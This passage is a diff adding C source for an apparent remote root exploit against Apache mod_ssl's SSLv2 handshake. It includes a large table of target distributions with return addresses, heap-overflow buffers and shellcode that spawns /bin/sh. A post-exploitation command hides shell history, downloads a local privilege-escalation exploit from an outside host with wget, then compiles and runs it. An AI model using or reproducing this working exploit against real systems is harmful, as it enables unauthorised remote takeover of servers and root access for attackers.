+{"Debian GNU Linux (apache_1.3.19-1)",0x080966fc},
+{"Debian GNU Linux (apache_1.3.22-2)",0x08096aac},
+{"Debian GNU Linux (apache-1.3.22-2.1)",0x08083828},
+{"Debian GNU Linux (apache-1.3.22-5)",0x08083728},
+{"Debian GNU Linux (apache_1.3.23-1)",0x08085de8},
+{"Debian GNU Linux (apache_1.3.24-2.1)",0x08087d08},
+{"Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",0x080873ac},
+{"Debian GNU Linux (apache_1.3.24-3)",0x08087d68},
+{"Debian GNU Linux (apache-1.3.26-1)",0x0080863c4},
+{"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",0x080863cc},
+{"Debian GNU Linux (apache-1.3.27)",0x0080866a3},
+{"FreeBSD (apache-1.3.9)", 0xbfbfde00},
+{"FreeBSD (apache-1.3.11)",0x080a2ea8},
+{"FreeBSD (apache-1.3.12.1.40)",0x080a7f58},
+{"FreeBSD (apache-1.3.12.1.40)",0x080a0ec0},
+{"FreeBSD (apache-1.3.12.1.40)",0x080a7e7c},
+{"FreeBSD (apache-1.3.12.1.40_1)",0x080a7f18},
+{"FreeBSD (apache-1.3.12)",0x0809bd7c},
+{"FreeBSD (apache-1.3.14)", 0xbfbfdc00},
+{"FreeBSD (apache-1.3.14)",0x080ab68c},
+{"FreeBSD (apache-1.3.14)",0x0808c76c},
+{"FreeBSD (apache-1.3.14)",0x080a3fc8},
+{"FreeBSD (apache-1.3.14)",0x080ab6d8},
+{"FreeBSD (apache-1.3.17_1)",0x0808820c},
+{"FreeBSD (apache-1.3.19)", 0xbfbfdc00},
+{"FreeBSD (apache-1.3.19_1)",0x0808c96c},
+{"FreeBSD (apache-1.3.20)",0x0808cb70},
+{"FreeBSD (apache-1.3.20)", 0xbfbfc000},
+{"FreeBSD (apache-1.3.20+2.8.4)",0x0808faf8},
+{"FreeBSD (apache-1.3.20_1)",0x0808dfb4},
+{"FreeBSD (apache-1.3.22)", 0xbfbfc000},
+{"FreeBSD (apache-1.3.22_7)",0x0808d110},
+{"FreeBSD (apache_fp-1.3.23)",0x0807c5f8},
+{"FreeBSD (apache-1.3.24_7)",0x0808f8b0},
+{"FreeBSD (apache-1.3.24+2.8.8)",0x080927f8},
+{"FreeBSD 4.6.2-Release-p6 (apache-1.3.26)",0x080c432c},
+{"FreeBSD 4.6-Realease (apache-1.3.26)",0x0808fdec},
+{"FreeBSD (apache-1.3.27)",0x080902e4},
+{"Gentoo Linux (apache-1.3.24-r2)",0x08086c34},
+{"Linux Generic (apache-1.3.14)",0xbffff500},
+{"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",0x080808ab},
+{"Mandrake Linux 7.1 (apache-1.3.14-2)",0x0809f6c4},
+{"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",0x0809d233},
+{"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",0x0809f6ef},
+{"Mandrake Linux 7.2 (apache-1.3.14) 2",0x0809d6c4},
+{"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",0x0809ccde},
+{"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",0x0809ce14},
+{"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",0x0809d262},
+{"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",0x08083545},
+{"Mandrake Linux 8.0 (apache-1.3.19-3)",0x0809ea98},
+{"Mandrake Linux 8.1 (apache-1.3.20-3)",0x0809e97c},
+{"Mandrake Linux 8.2 (apache-1.3.23-4)",0x08086580},
+{"Mandrake Linux 8.2 #2 (apache-1.3.23-4)",0x08086484},
+{"Mandrake Linux 8.2 (apache-1.3.24)",0x08086665},
+{"Mandrake Linux 9 (apache-1.3.26)",0x0808b864},
+{"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",0x0808c0f4},
+{"RedHat Linux TEST1 (apache-1.3.12-1)",0x0808c0f4},
+{"RedHat Linux TEST2 (apache-1.3.12-1)",0x0808c0f4},
+{"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",0x080d2c35},
+{"RedHat Linux 4.2 (apache-1.1.3-3)",0x08065bae},
+{"RedHat Linux 5.0 (apache-1.2.4-4)",0x0808c82c},
+{"RedHat Linux 5.1-Update (apache-1.2.6)",0x08092a45},
+{"RedHat Linux 5.1 (apache-1.2.6-4)",0x08092c2d},
+{"RedHat Linux 5.2 (apache-1.3.3-1)",0x0806f049},
+{"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",0x0808e4d8},
+{"RedHat Linux 6.0 (apache-1.3.6-7)",0x080707ec},
+{"RedHat Linux 6.0 (apache-1.3.6-7)",0x080707f9},
+{"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",0x0808fd52},
+{"RedHat Linux 6.0 Update (apache-1.3.24)",0x80acd58},
+{"RedHat Linux 6.1 (apache-1.3.9-4)1",0x0808ccc4},
+{"RedHat Linux 6.1 (apache-1.3.9-4)2",0x0808ccdc},
+{"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",0x0808fd5d},
+{"RedHat Linux 6.1-fp2000 (apache-1.3.26)",0x082e6fcd},
+{"RedHat Linux 6.2 (apache-1.3.12-2)1",0x0808f689},
+{"RedHat Linux 6.2 (apache-1.3.12-2)2",0x0808f614},
+{"RedHat Linux 6.2 mod(apache-1.3.12-2)3",0xbffff94c},
+{"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",0x0808f9ec},
+{"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",0x0808f9d4},
+{"Redhat Linux 7.x (apache-1.3.22)",0x0808400c},
+{"RedHat Linux 7.x (apache-1.3.26-1)",0x080873bc},
+{"RedHat Linux 7.x (apache-1.3.27)",0x08087221},
+{"RedHat Linux 7.0 (apache-1.3.12-25)1",0x0809251c},
+{"RedHat Linux 7.0 (apache-1.3.12-25)2",0x0809252d},
+{"RedHat Linux 7.0 (apache-1.3.14-2)",0x08092b98},
+{"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",0x08084358},
+{"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",0x0808438c},
+{"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",0x08086e41},
+{"RedHat Linux 7.1 (apache-1.3.19-5)1",0x0809af8c},
+{"RedHat Linux 7.1 (apache-1.3.19-5)2",0x0809afd9},
+{"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",0x0808438c},
+{"RedHat Linux 7.1-Update (1.3.22-5.7.1)",0x08084389},
+{"RedHat Linux 7.1 (apache-1.3.22-src)",0x0816021c},
+{"RedHat Linux 7.1-Update (1.3.27-1.7.1)",0x08086ec89},
+{"RedHat Linux 7.2 (apache-1.3.20-16)1",0x080994e5},
+{"RedHat Linux 7.2 (apache-1.3.20-16)2",0x080994d4},
+{"RedHat Linux 7.2-Update (apache-1.3.22-6)",0x08084045},
+{"RedHat Linux 7.2 (apache-1.3.24)",0x80b0938},
+{"RedHat Linux 7.2 (apache-1.3.26)",0x08161c16},
+{"RedHat Linux 7.2 (apache-1.3.26-snc)",0x8161c14},
+{"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",0x08269950},
+{"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",0x08269988},
+{"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",0x08086af9},
+{"RedHat Linux 7.3 (apache-1.3.23-11)1",0x0808528c},
+{"RedHat Linux 7.3 (apache-1.3.23-11)2",0x0808525f},
+{"RedHat Linux 7.3 (apache-1.3.27)",0x080862e4},
+{"RedHat Linux 8.0 (apache-1.3.27)",0x08084c1c},
+{"RedHat Linux 8.0-second (apache-1.3.27)",0x0808151e},
+{"RedHat Linux 8.0 (apache-2.0.40)",0x08092fa4},
+{"Slackware Linux 4.0 (apache-1.3.6)",0x08088130},
+{"Slackware Linux 7.0 (apache-1.3.9)",0x080a7fc0},
+{"Slackware Linux 7.0 (apache-1.3.26)",0x083d37fc},
+{"Slackware 7.0  (apache-1.3.26)2",0x083d2232},
+{"Slackware Linux 7.1 (apache-1.3.12)",0x080a86a4},
+{"Slackware Linux 8.0 (apache-1.3.20)",0x080ae67c},
+{"Slackware Linux 8.1 (apache-1.3.24)",0x080b0c60},
+{"Slackware Linux 8.1 (apache-1.3.26)",0x080b2100},
+{"Slackware Linux 8.1-stable (apache-1.3.26)",0x080b0c60},
+{"Slackware Linux (apache-1.3.27)",0x080b1a3a},
+{"SuSE Linux 7.0 (apache-1.3.12)",0x0809f54c},
+{"SuSE Linux 7.1 (apache-1.3.17)",0x08099984},
+{"SuSE Linux 7.2 (apache-1.3.19)",0x08099ec8},
+{"SuSE Linux 7.3 (apache-1.3.20)",0x08099da8},
+{"SuSE Linux 8.0 (apache-1.3.23)",0x08086168},
+{"SUSE Linux 8.0 (apache-1.3.23-120)",0x080861c8},
+{"SuSE Linux 8.0 (apache-1.3.23-137)",0x080861c8},
+/* this one unchecked cause require differend shellcode */
+{"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",0xfd42630},
+
+};
+
+extern int errno;
+
+int cipher;
+int ciphers;
+
+/* the offset of the local port from be beginning of the overwrite next chunk buffer */
+#define FINDSCKPORTOFS     208 + 12 + 46
+
+unsigned char overwrite_session_id_length[] =
+	"AAAA"								/* int master key length; */
+	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char master key[SSL MAX MASTER KEY LENGTH];	*/
+	"\x70\x00\x00\x00";					/* unsigned int session id length; */
+
+unsigned char overwrite_next_chunk[] =
+	"AAAA"								/* int master key length; */
+	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char master key[SSL MAX MASTER KEY LENGTH];	*/
+	"AAAA"								/* unsigned int session id length; */
+	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
+	"AAAA"								/* unsigned int sid ctx length; */
+	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
+	"AAAA"								/* int not resumable; */
+	"\x00\x00\x00\x00"					/* struct sess cert st *sess cert; */
+	"\x00\x00\x00\x00"					/* X509 *peer; */
+	"AAAA"								/* long verify result; */
+	"\x01\x00\x00\x00"					/* int references; */
+	"AAAA"								/* int timeout; */
+	"AAAA"								/* int time */
+	"AAAA"								/* int compress meth; */
+	"\x00\x00\x00\x00"					/* SSL CIPHER *cipher; */
+	"AAAA"								/* unsigned long cipher id; */
+	"\x00\x00\x00\x00"					/* STACK OF(SSL CIPHER) *ciphers; */
+	"\x00\x00\x00\x00\x00\x00\x00\x00"	/* CRYPTO EX DATA ex data; */
+	"AAAAAAAA"							/* struct ssl session st *prev,*next; */
+
+	"\x00\x00\x00\x00"					/* Size of previous chunk */
+	"\x11\x00\x00\x00"					/* Size of chunk, in bytes */
+	"fdfd"								/* Forward and back pointers */
+	"bkbk"
+	"\x10\x00\x00\x00"					/* Size of previous chunk */
+	"\x10\x00\x00\x00"					/* Size of chunk, PREV INUSE is set */
+
+/* shellcode start */
+    "\xeb\x0a\x90\x90"	/* jump 10 bytes ahead, land at shellcode */
+    "\x90\x90\x90\x90"
+    "\x90\x90\x90\x90"	/* this is overwritten with FD by the unlink macro */
+
+/* 72 bytes findsckcode by LSD-pl */
+    "\x31\xdb"             /* xorl    %ebx,%ebx              */
+    "\x89\xe7"             /* movl    %esp,%edi              */
+    "\x8d\x77\x10"         /* leal    0x10(%edi),%esi        */
+    "\x89\x77\x04"         /* movl    %esi,0x4(%edi)         */
+    "\x8d\x4f\x20"         /* leal    0x20(%edi),%ecx        */
+    "\x89\x4f\x08"         /* movl    %ecx,0x8(%edi)         */
+    "\xb3\x10"             /* movb    $0x10,%bl              */
+    "\x89\x19"             /* movl    %ebx,(%ecx)            */
+    "\x31\xc9"             /* xorl    %ecx,%ecx              */
+    "\xb1\xff"             /* movb    $0xff,%cl              */
+    "\x89\x0f"             /* movl    %ecx,(%edi)            */
+    "\x51"                 /* pushl   %ecx                   */
+    "\x31\xc0"             /* xorl    %eax,%eax              */
+    "\xb0\x66"             /* movb    $0x66,%al              */
+    "\xb3\x07"             /* movb    $0x07,%bl              */
+    "\x89\xf9"             /* movl    %edi,%ecx              */
+    "\xcd\x80"             /* int     $0x80                  */
+    "\x59"                 /* popl    %ecx                   */
+    "\x31\xdb"             /* xorl    %ebx,%ebx              */
+    "\x39\xd8"             /* cmpl    %ebx,%eax              */
+    "\x75\x0a"             /* jne     <findsckcode+54>       */
+    "\x66\xb8\x12\x34"     /* movw    $0x1234,%bx            */
+    "\x66\x39\x46\x02"     /* cmpw    %bx,0x2(%esi)          */
+    "\x74\x02"             /* je      <findsckcode+56>       */
+    "\xe2\xe0"             /* loop    <findsckcode+24>       */
+    "\x89\xcb"             /* movl    %ecx,%ebx              */
+    "\x31\xc9"             /* xorl    %ecx,%ecx              */
+    "\xb1\x03"             /* movb    $0x03,%cl              */
+    "\x31\xc0"             /* xorl    %eax,%eax              */
+    "\xb0\x3f"             /* movb    $0x3f,%al              */
+    "\x49"                 /* decl    %ecx                   */
+    "\xcd\x80"             /* int     $0x80                  */
+    "\x41"                 /* incl    %ecx                   */
+    "\xe2\xf6"             /* loop    <findsckcode+62>       */
+
+/* 10 byte setresuid(0,0,0); by core */
+     "\x31\xc9"       /* xor    %ecx,%ecx */
+     "\xf7\xe1"       /* mul    %ecx,%eax */
+     "\x51"           /* push   %ecx */
+     "\x5b"           /* pop    %ebx */
+     "\xb0\xa4"       /* mov    $0xa4,%al */
+     "\xcd\x80"       /* int    $0x80 */
+
+    
+/* bigger shellcode added by spabam */
+
+/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
+        "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
+*/
+
+
+/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
+    "\x31\xc0"             /* xorl    %eax,%eax              */
+    "\x50"                 /* pushl   %eax                   */
+    "\x68""//sh"           /* pushl   $0x68732f2f            */
+    "\x68""/bin"           /* pushl   $0x6e69622f            */
+    "\x89\xe3"             /* movl    %esp,%ebx              */
+    "\x50"                 /* pushl   %eax                   */
+    "\x53"                 /* pushl   %ebx                   */
+    "\x89\xe1"             /* movl    %esp,%ecx              */
+    "\x99"                 /* cdql                           */
+    "\xb0\x0b"             /* movb    $0x0b,%al              */
+    "\xcd\x80";             /* int     $0x80                  */
+
+/* read and write buffer*/
+#define BUFSIZE 16384
+
+/* hardcoded protocol stuff */
+#define CHALLENGE_LENGTH 16
+#define RC4_KEY_LENGTH 16	/* 128 bits */
+#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
+
+/* straight from the openssl source */
+#define n2s(c,s)    ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1]))    )),c+=2)
+#define s2n(s,c)    ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
+
+/* we keep all SSL2 state in this structure */
+typedef struct {
+	int sock;
+
+	/* client stuff */
+	unsigned char challenge[CHALLENGE_LENGTH];
+	unsigned char master_key[RC4_KEY_LENGTH];
+	unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
+
+	/* connection id - returned by the server */
+	int conn_id_length;
+	unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
+
+	/* server certificate */
+	X509 *x509;
+
+	/* session keys */
+	unsigned char* read_key;
+	unsigned char* write_key;
+	RC4_KEY* rc4_read_key;
+	RC4_KEY* rc4_write_key;
+
+	/* sequence numbers, used for MAC calculation */
+	int read_seq;
+	int write_seq;
+
+	/* set to 1 when the SSL2 handshake is complete */
+	int encrypted;
+} ssl_conn;
+
+#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
+#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"
+
+long getip(char *hostname) {
+	struct hostent *he;
+	long ipaddr;
+	
+	if ((ipaddr = inet_addr(hostname)) < 0) {
+		if ((he = gethostbyname(hostname)) == NULL) {
+			perror("gethostbyname()");
+			exit(-1);
+		}
+		memcpy(&ipaddr, he->h_addr, he->h_length);
+	}	
+	return ipaddr;
+}
+
+/* mixter's code w/enhancements by core */
+
+int sh(int sockfd) {
+   char snd[1024], rcv[1024];
+   fd_set rset;
+   int maxfd, n;
+
+   /* Priming commands */
+   strcpy(snd, COMMAND1 "\n");
+   write(sockfd, snd, strlen(snd));
+
+   strcpy(snd, COMMAND2 "\n");
+   write(sockfd, snd, strlen(snd));
+
+   /* Main command loop */
+   for (;;) {
+      FD_SET(fileno(stdin), &rset);
+      FD_SET(sockfd, &rset);
+
+      maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
+      select(maxfd, &rset, NULL, NULL, NULL);
+
+      if (FD_ISSET(fileno(stdin), &rset)) {
+	 bzero(snd, sizeof(snd));
+	 fgets(snd, sizeof(snd)-2, stdin);
+	 write(sockfd, snd, strlen(snd));
+      }
+
+      if (FD_ISSET(sockfd, &rset)) {
+	 bzero(rcv, sizeof(rcv));
+
+	 if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
+	    printf("Good Bye!\n");
+	    return 0;
+	 }
+
+	 if (n < 0) {
+	    perror("read");
+	    return 1;
+	 }
+
+	 fputs(rcv, stdout);
+	 fflush(stdout); /* keeps output nice */
+      }
+   } /* for(;;) */
+}
+
+/* Returns the local port of a connected socket */
+int get_local_port(int sock)
+{
+	struct sockaddr_in s_in;
+	unsigned int namelen = sizeof(s_in);
+
+	if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
+		printf("Can't get local port: %s\n", strerror(errno));
+		exit(1);
+	}
+
+	return s_in.sin_port;
+}
+
+/* Connect to a host */
+int connect_host(char* host, int port)
+{
+	struct sockaddr_in s_in;
+	int sock;
+
+	s_in.sin_family = AF_INET;
+	s_in.sin_addr.s_addr = getip(host);
+	s_in.sin_port = htons(port);
+
+	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
+		printf("Could not create a socket\n");
+		exit(1);
+	}
+
+	if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
+		printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
+		exit(1);
+	}
+
+	return sock;
+}
+
+/* Create a new ssl conn structure and connect to a host */
+ssl_conn* ssl_connect_host(char* host, int port)
+{
+	ssl_conn* ssl;
+
+	if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
+		printf("Can't allocate memory\n");
+		exit(1);
+	}
+
+	/* Initialize some values */
+	ssl->encrypted = 0;
+	ssl->write_seq = 0;
+	ssl->read_seq = 0;
+
+	ssl->sock = connect_host(host, port);
+
+	return ssl;
+}
+
+/* global buffer used by the ssl result() */
+char res_buf[30];
+
+/* converts an SSL error code to a string */
+char* ssl_error(int code) {
+	switch (code) {
+		case 0x00:	return "SSL2 PE UNDEFINED ERROR (0x00)";
+		case 0x01:	return "SSL2 PE NO CIPHER (0x01)";
+		case 0x02:	return "SSL2 PE NO CERTIFICATE (0x02)";
+		case 0x04:	return "SSL2 PE BAD CERTIFICATE (0x03)";
+		case 0x06:	return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
+	default:
+		sprintf(res_buf, "%02x", code);
+		return res_buf;
+	}
+}
+
+/* read len bytes from a socket. boring. */
+int read_data(int sock, unsigned char* buf, int len)
+{
+	int l;
+	int to_read = len;
+
+	do {
+		if ((l = read(sock, buf, to_read)) < 0) {
+			printf("Error in read: %s\n", strerror(errno));
+			exit(1);
+		}
+		to_read -= len;
+	} while (to_read > 0);
+
+	return len;
+}
+
+/* reads an SSL packet and decrypts it if necessery */
+int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
+{
+	int rec_len, padding;
+
+	read_data(ssl->sock, buf, 2);
+
+	if ((buf[0] & 0x80) == 0) {
+		/* three byte header */
+		rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
+		read_data(ssl->sock, &buf[2], 1);
+		padding = (int)buf[2];
+	}
+	else {
+		/* two byte header */
+		rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
+		padding = 0;
+	}
+
+	if ((rec_len <= 0) || (rec_len > buf_size)) {
+		printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); 
+		exit(1);
+	}
+
+	read_data(ssl->sock, buf, rec_len);
+
+	if (ssl->encrypted) {
+		if (MD5_DIGEST_LENGTH + padding >= rec_len) {
+			if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
+				/* the server didn't switch to encryption due to an error */
+				return 0;
+			}
+			else {
+				printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
+				exit(1);
+			}
+		}
+
+		/* decrypt the encrypted part of the packet */
+		RC4(ssl->rc4_read_key, rec_len, buf, buf);
+
+		/* move the decrypted message in the beginning of the buffer */
+		rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
+		memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
+	}
+
+	if (buf[0] == SSL2_MT_ERROR) {
+		if (rec_len != 3) {
+			printf("Malformed server error message\n");
+			exit(1);
+		}
+		else {
+			return 0;
+		}
+	}
+
+	return rec_len;
+}
+
+/* send an ssl packet, encrypting it if ssl->encrypted is set */
+void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
+{
+	unsigned char buf[BUFSIZE];
+	unsigned char* p;
+	int tot_len;
+	MD5_CTX ctx;
+	int seq;
+
+
+	if (ssl->encrypted)
+		tot_len = rec_len + MD5_DIGEST_LENGTH;	/* RC4 needs no padding */
+	else
+		tot_len = rec_len;
+
+	if (2 + tot_len > BUFSIZE) {
+		printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
+		exit(1);
+	}
+
+	p = buf;
+	s2n(tot_len, p);
+
+	buf[0] = buf[0] | 0x80;	/* two byte header */
+
+	if (ssl->encrypted) {
+		/* calculate the MAC */
+		seq = ntohl(ssl->write_seq);
+
+		MD5_Init(&ctx);
+		MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
+		MD5_Update(&ctx, rec, rec_len);
+		MD5_Update(&ctx, &seq, 4);
+		MD5_Final(p, &ctx);
+
+		p+=MD5_DIGEST_LENGTH;
+
+		memcpy(p, rec, rec_len);
+
+		/* encrypt the payload */
+		RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
+
+	}
+	else {
+		memcpy(p, rec, rec_len);
+	}
+
+	send(ssl->sock, buf, 2 + tot_len, 0);
+
+	/* the sequence number is incremented by both encrypted and plaintext packets
+*/
+	ssl->write_seq++;
+}
+
+/* Send a CLIENT HELLO message to the server */
+void send_client_hello(ssl_conn *ssl)
+{
+	int i;
+	unsigned char buf[BUFSIZE] =
+		"\x01"			/* client hello msg */
+
+		"\x00\x02"		/* client version */
+		"\x00\x18"		/* cipher specs length */
+		"\x00\x00"		/* session id length */
+		"\x00\x10"		/* challenge length */
+
+		"\x07\x00\xc0\x05\x00\x80\x03\x00"	/* cipher specs data */
+		"\x80\x01\x00\x80\x08\x00\x80\x06"
+		"\x00\x40\x04\x00\x80\x02\x00\x80"
+
+		"";									/* session id data */
+
+	/* generate CHALLENGE LENGTH bytes of challenge data */
+	for (i = 0; i < CHALLENGE_LENGTH; i++) {
+		ssl->challenge[i] = (unsigned char) (rand() >> 24);
+	}
+	memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
+
+	send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
+}
+
+/* Get a SERVER HELLO response from the server */
+void get_server_hello(ssl_conn* ssl)
+{
+	unsigned char buf[BUFSIZE];
+	const unsigned char *p, *end;
+	int len;
+	int server_version, cert_length, cs_length, conn_id_length;
+	int found;
+
+	if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
+		printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
+		exit(1);
+	}
+	if (len < 11) {
+		printf("get_server_hello: Packet too short (len = %d)\n", len);
+		exit(1);
+	}
+
+	p = buf;
+
+	if (*(p++) != SSL2_MT_SERVER_HELLO) {
+		printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
+		exit(1);
+	}
+	
+
+	if (*(p++) != 0) {
+		printf("get_server_hello: SESSION-ID-HIT is not 0\n");
+		exit(1);
+	}
+
+	if (*(p++) != 1) {
+		printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
+		exit(1);
+	}
+
+	n2s(p, server_version);
+	if (server_version != 2) {
+		printf("get_server_hello: Unsupported server version %d\n", server_version);
+		exit(1);
+	}
+
+	n2s(p, cert_length);
+	n2s(p, cs_length);
+	n2s(p, conn_id_length);
+
+	if (len != 11 + cert_length + cs_length + conn_id_length) {
+		printf("get_server_hello: Malformed packet size\n");
+		exit(1);
+	}
+
+	/* read the server certificate */
+	ssl->x509 = NULL;
+	ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
+	if (ssl->x509 == NULL) {
+		printf("get server hello: Cannot parse x509 certificate\n");
+		exit(1);
+	}
+
+	if (cs_length % 3 != 0) {
+		printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
+		exit(1);
+	}
+
+	found = 0;
+	for (end=p+cs_length; p < end; p += 3) {
+		if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
+			found = 1;	/* SSL CK RC4 128 WITH MD5 */
+	}
+
+	if (!found) {
+		printf("get server hello: Remote server does not support 128 bit RC4\n");
+		exit(1);
+	}
+
+	if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
+		printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
+		exit(1);
+	}
+
+	/* The connection id is sent back to the server in the CLIENT FINISHED packet */
+	ssl->conn_id_length = conn_id_length;
+	memcpy(ssl->conn_id, p, conn_id_length);
+}
+
+/* Send a CLIENT MASTER KEY message to the server */
+
+void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
+	int encrypted_key_length, key_arg_length, record_length;
+	unsigned char* p;
+	int i;
+	EVP_PKEY *pkey=NULL;
+
+	unsigned char buf[BUFSIZE] =
+		"\x02"			/* client master key message */
+		"\x01\x00\x80"	/* cipher kind */
+		"\x00\x00"		/* clear key length */
+		"\x00\x40"		/* encrypted key length */
+		"\x00\x08";		/* key arg length */
+
+	p = &buf[10];
+
+	/* generate a 128 byte master key */
+	for (i = 0; i < RC4_KEY_LENGTH; i++) {
+		ssl->master_key[i] = (unsigned char) (rand() >> 24);
+	}
+
+	pkey=X509_get_pubkey(ssl->x509);
+	if (!pkey) {
+		printf("send client master key: No public key in the server certificate\n");
+		exit(1);
+	}
+
+	if (EVP_PKEY_get1_RSA(pkey) == NULL) {
+		printf("send client master key: The public key in the server certificate is not a RSA key\n");
+		exit(1);
+	}
+
+	/* Encrypt the client master key with the server public key and put it in the packet */
+	encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
+	if (encrypted_key_length <= 0) {
+		printf("send client master key: RSA encryption failure\n");
+		exit(1);
+	}
+
+	p += encrypted_key_length;
+
+	if (key_arg_overwrite) {
+		/* These 8 bytes fill the key arg array on the server */
+		for (i = 0; i < 8; i++) {
+			*(p++) = (unsigned char) (rand() >> 24);
+		}
+		/* This overwrites the data following the key arg array */
+		memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
+
+		key_arg_length = 8 + key_arg_overwrite_len;
+	}
+	else {
+		key_arg_length = 0;	/* RC4 doesn't use KEY-ARG */
+	}
+	p = &buf[6];
+	s2n(encrypted_key_length, p);
+	s2n(key_arg_length, p);
+	record_length = 10 + encrypted_key_length + key_arg_length;
+	send_ssl_packet(ssl, buf, record_length);
+	ssl->encrypted = 1;
+}
+void generate_key_material(ssl_conn* ssl)
+{
+	unsigned int i;
+	MD5_CTX ctx;
+	unsigned char *km;
+	unsigned char c='0';
+
+	km=ssl->key_material;
+	for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
+		MD5_Init(&ctx);
+
+		MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
+		MD5_Update(&ctx,&c,1);
+		c++;
+		MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
+		MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
+		MD5_Final(km,&ctx);
+		km+=MD5_DIGEST_LENGTH;
+	}
+}
+void generate_session_keys(ssl_conn* ssl)
+{
+	generate_key_material(ssl);
+	ssl->read_key = &(ssl->key_material[0]);
+	ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
+	RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
+
+	ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
+	ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
+	RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
+}
+void get_server_verify(ssl_conn* ssl)
+{
+	unsigned char buf[BUFSIZE];
+	int len;
+	if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
